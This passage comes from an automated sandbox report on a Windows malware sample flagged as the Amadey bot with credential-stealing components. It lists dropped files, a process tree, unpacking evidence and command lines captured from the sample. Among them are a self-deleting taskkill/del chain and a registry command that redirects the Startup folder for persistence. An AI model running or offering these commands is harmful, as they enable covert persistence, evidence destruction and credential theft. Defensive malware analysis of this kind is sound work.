                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0223E31010_2_0223E310
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0224397010_2_02243970
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_022429BD10_2_022429BD
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0224164710_2_02241647
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0224176710_2_02241767
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_02232C5710_2_02232C57
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: String function: 0040F4A0 appears 39 times
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: String function: 0210E120 appears 77 times
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: String function: 0040DED0 appears 77 times
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: String function: 0210F6F0 appears 33 times
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: String function: 0040F4A0 appears 39 times
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: String function: 0222F6F0 appears 33 times
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: String function: 0040DED0 appears 80 times
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: String function: 0222E120 appears 79 times
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: String function: 004651EC appears 32 times
                              Source: wKYTg7Gp6P.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                              Source: xsrv2[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: xsrv2[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: xsrv2[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: xsrv2[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: M7WCJ84VE5TXJ0R4.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: M7WCJ84VE5TXJ0R4.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: M7WCJ84VE5TXJ0R4.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: M7WCJ84VE5TXJ0R4.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: blfte.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: blfte.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: blfte.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: blfte.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700521100.0000000002460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701283125.0000000003110000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700586635.00000000024B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.668255805.0000000002C8B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700435340.0000000002230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701719719.0000000003500000.00000002.00000001.sdmpBinary or memory string: originalfilename vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701719719.0000000003500000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701448741.0000000003300000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs wKYTg7Gp6P.exe
                              Source: wKYTg7Gp6P.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: wKYTg7Gp6P.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@21/30@2/6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040C26E _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,FindCloseChangeNotification,0_2_0040C26E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040A91B __EH_prolog3,InternetSetFilePointer,InternetReadFile,_memmove,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,0_2_0040A91B
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3028:120:WilError_01
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeMutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeFile created: C:\Users\user\AppData\Local\Temp\15213853321935212556Jump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCommand line argument: -B5_2_00422D40
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCommand line argument: -B10_2_00422D40
                              Source: wKYTg7Gp6P.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wKYTg7Gp6P.exe&quot;)
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                              Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
                              Source: wKYTg7Gp6P.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                              Source: wKYTg7Gp6P.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                              Source: softokn3[1].dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                              Source: wKYTg7Gp6P.exe, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                              Source: wKYTg7Gp6P.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                              Source: softokn3[1].dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL id FROM %s;
                              Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                              Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                              Source: wKYTg7Gp6P.exe, nss3.dll.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                              Source: wKYTg7Gp6P.exe, nss3.dll.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                              Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                              Source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                              Source: wKYTg7Gp6P.exeVirustotal: Detection: 48%
                              Source: wKYTg7Gp6P.exeReversingLabs: Detection: 58%
                              Source: unknownProcess created: C:\Users\user\Desktop\wKYTg7Gp6P.exe 'C:\Users\user\Desktop\wKYTg7Gp6P.exe'
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe'
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeProcess created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe'
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe' Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exitJump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeProcess created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, MainJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\Jump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: M7WCJ84VE5TXJ0R4.exe, blfte.exe
                              Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
                              Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
                              Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr

                              Data Obfuscation:

                              barindex
                              Detected unpacking (changes PE section rights)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack .text:ER;.data:W;.mijoza:W;.tls:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                              Detected unpacking (overwrites its own PE header)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040EBA8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,0_2_0040EBA8
                              Source: wKYTg7Gp6P.exeStatic PE information: section name: .mijoza
                              Source: wKYTg7Gp6P.exeStatic PE information: section name: .new
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047E67A pushad ; retn 0048h0_2_0047E680
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047E685 pushad ; retn 0048h0_2_0047E68B
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047E690 pushad ; retn 0048h0_2_0047E696
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F4E6 push ecx; ret 5_2_0040F4F9
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0042AD75 push esi; ret 5_2_0042AD7E
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0040F4E6 push ecx; ret 10_2_0040F4F9
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0042AD75 push esi; ret 10_2_0042AD7E
                              Source: initial sampleStatic PE information: section name: .text entropy: 7.88074668674

                              Persistence and Installation Behavior:

                              barindex
                              Yara detected Amadey botShow sources
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: blfte.exe PID: 5756, type: MEMORY
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\vcruntime140[1].dllJump to dropped file
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeFile created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\ProgramData\1a9f26b569d5df\scr.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\ProgramData\1a9f26b569d5df\cred.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exeJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\ProgramData\1a9f26b569d5df\scr.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile created: C:\ProgramData\1a9f26b569d5df\cred.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                              Boot Survival:

                              barindex
                              Creates an undocumented autostart registry key Show sources
